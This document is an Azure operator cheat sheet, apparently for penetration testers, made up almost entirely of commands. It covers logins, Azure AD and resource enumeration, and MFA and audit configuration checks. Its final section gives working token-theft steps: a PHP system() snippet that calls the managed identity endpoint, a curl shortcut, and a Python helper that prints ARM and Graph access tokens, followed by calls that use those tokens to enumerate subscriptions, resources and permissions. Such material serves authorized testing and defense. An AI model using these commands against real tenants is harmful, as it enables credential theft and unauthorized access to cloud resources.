$ cat report.md Operator Note

Azure Operator Reference

Azure connection, enumeration, configuration review, and managed identity commands in one reference.

Notes
Collection Azure Type Operator note

One Azure reference page for connection setup, Azure AD enumeration, tenant review, and managed identity driven API enumeration.

Authentication and Session Setup

Start here when you need a quick login path before moving into tenant or subscription inspection.

AzureAD Module

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<[email protected]>", $password)
Connect-AzureAD -Credential $creds

Azure CLI

az login --username "<[email protected]>" --password "<password>"

Azure Resource Toolkit

Connect-ART -Username "<[email protected]>" -Password "<password>"

PowerShell Remoting

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<username>", $password)
$session = New-PSSession -ComputerName "<target-host-or-ip>" -Credential $creds
Enter-PSSession -Session $session

Azure AD Enumeration

Use these blocks for user, group, device, app, and role discovery across the tenant.

Users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | Select-Object UserPrincipalName
Get-AzureADUser -ObjectId "<[email protected]>"
Get-AzureADUser -SearchString "admin"
Get-AzureADUser -All $true | Where-Object { $_.DisplayName -match "admin" }
Get-AzureADUser -ObjectId "<[email protected]>" | Format-List *
Get-AzureADUser -ObjectId "<[email protected]>" | ForEach-Object { $_.PSObject.Properties.Name }
Get-AzureADUser -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -ne $null }
Get-AzureADUser -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -eq $null }

User-Created and Owned Objects

Get-AzureADUser | Get-AzureADUserCreatedObject
Get-AzureADUserOwnedObject -ObjectId "<[email protected]>"

Groups

Get-AzureADGroup -All $true
Get-AzureADGroup -ObjectId "<group-object-id>"
Get-AzureADGroup -SearchString "admin" | Format-List *
Get-AzureADGroup -All $true | Where-Object { $_.DisplayName -match "admin" }
Get-AzureADMSGroup | Where-Object { $_.GroupTypes -eq "DynamicMembership" }
Get-AzureADGroup -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -ne $null }
Get-AzureADGroup -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -eq $null }
Get-AzureADGroupMember -ObjectId "<group-object-id>"

Memberships and Directory Roles

Get-AzureADUser -SearchString "test" | Get-AzureADUserMembership
Get-AzureADUserMembership -ObjectId "<[email protected]>"
Get-AzureADDirectoryRoleTemplate
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -Filter "DisplayName eq 'GlobalAdministrator'" | Get-AzureADDirectoryRoleMember

Devices

Get-AzureADDevice -All $true | Format-List *
Get-AzureADDeviceConfiguration | Format-List *
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADUserOwnedDevice -ObjectId "<[email protected]>"
Get-AzureADUserRegisteredDevice -ObjectId "<[email protected]>"
Get-AzureADDevice -All $true | Where-Object { $_.IsCompliant -eq "True" }

Applications and Service Principals

Get-AzureADApplication -All $true
Get-AzureADApplication -ObjectId "<application-object-id>" | Format-List *
Get-AzureADApplication -All $true | Where-Object { $_.DisplayName -match "app" }
Get-AzureADApplication -ObjectId "<application-object-id>" | Get-AzureADApplicationOwner | Format-List *
Get-AzureADUser -ObjectId "<[email protected]>" | Get-AzureADUserAppRoleAssignment | Format-List *
Get-AzureADGroup -ObjectId "<group-object-id>" | Get-AzureADGroupAppRoleAssignment | Format-List *

Get-AzureADServicePrincipal -All $true
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Format-List *
Get-AzureADServicePrincipal -All $true | Where-Object { $_.DisplayName -match "app" }
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalOwner | Format-List *
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalOwnedObject
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalCreatedObject
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalMembership | Format-List *
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership

Az PowerShell and Azure CLI Resource Discovery

Get-AzResource
Get-AzRoleAssignment -SignInName "<[email protected]>"
Get-AzVM | Format-List
Get-AzWebApp | Where-Object { $_.Kind -notmatch "functionapp" }
Get-AzFunctionApp
Get-AzStorageAccount | Format-List
Get-AzKeyVault
az vm list
az vm list --query "[].[name]" -o table
az webapp list
az functionapp list --query "[].[name]" -o table
az storage account list --query "[].[name]" -o table
az keyvault list

Configuration Review

Keep this section for high-signal checks around roles, MFA posture, conditional access, and auditing.

Current User Role Assignments

$mySignInName = (Get-AzContext).Account.Id
Get-AzRoleAssignment -SignInName $mySignInName |
  Format-Table -Property RoleDefinitionName, Scope

Legacy Protocol and Strong Authentication Checks

Connect-MsolService
Get-MsolCompanyInformation | Select-Object -ExpandProperty UsersForStrongAuthentication

Users Without MFA

Install-Module AzureAD
Connect-MsolService
Get-MsolUser -All |
  Where-Object { $_.StrongAuthenticationMethods.Count -eq 0 } |
  Select-Object UserPrincipalName, DisplayName

Conditional Access Policies

Get-AzureADPolicy |
  Where-Object { $_.Type -eq "ConditionalAccess" } |
  Select-Object DisplayName, State

Unified Audit Configuration

Get-OrganizationConfig | Select-Object -ExpandProperty AuditDisabled

Default User Consent Policy

(Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole

Managed Identity and Token Operations

Use this section when you already have an execution context or token source and need to pivot into ARM or Graph.

Microsoft Graph User Enumeration from a Token

$token = "<graph-access-token>"
$uri = "https://graph.microsoft.com/v1.0/users"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

Managed Identity Token Extraction from an Execution Context

<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>

ARM Subscription Enumeration

$token = "<arm-access-token>"
$uri = "https://management.azure.com/subscriptions?api-version=2020-01-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

ARM Resource Enumeration

$token = "<arm-access-token>"
$subscriptionId = "<subscription-id>"
$uri = "https://management.azure.com/subscriptions/$subscriptionId/resources?api-version=2020-10-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

ARM Effective Permission Enumeration

$token = "<arm-access-token>"
$subscriptionId = "<subscription-id>"
$resourceGroup = "<resource-group>"
$vmName = "<vm-name>"
$uri = "https://management.azure.com/subscriptions/$subscriptionId/resourceGroups/$resourceGroup/providers/Microsoft.Compute/virtualMachines/$vmName/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

Use an ARM Token with Az PowerShell

$token = "<arm-access-token>"
Connect-AzAccount -AccessToken $token -AccountId "<managed-identity-client-id>"
Get-AzResource

Curl Shortcut

curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" \
  -H "secret:$IDENTITY_HEADER"

Python Helper for ARM and Graph Tokens

import json
import os

identity_endpoint = os.environ["IDENTITY_ENDPOINT"]
identity_header = os.environ["IDENTITY_HEADER"]

def get_token(resource):
    command = (
        f'curl "{identity_endpoint}?resource={resource}&api-version=2017-09-01" '
        f'-H "secret:{identity_header}"'
    )
    response = os.popen(command).read()
    return json.loads(response)

arm_token = get_token("https://management.azure.com/")
print("[+] Management API")
print("Access Token: " + arm_token["access_token"])
print("ClientID: " + arm_token["client_id"])

graph_token = get_token("https://graph.microsoft.com/")
print("\\n[+] Graph API")
print("Access Token: " + graph_token["access_token"])
print("ClientID: " + graph_token["client_id"])
Write-up archive.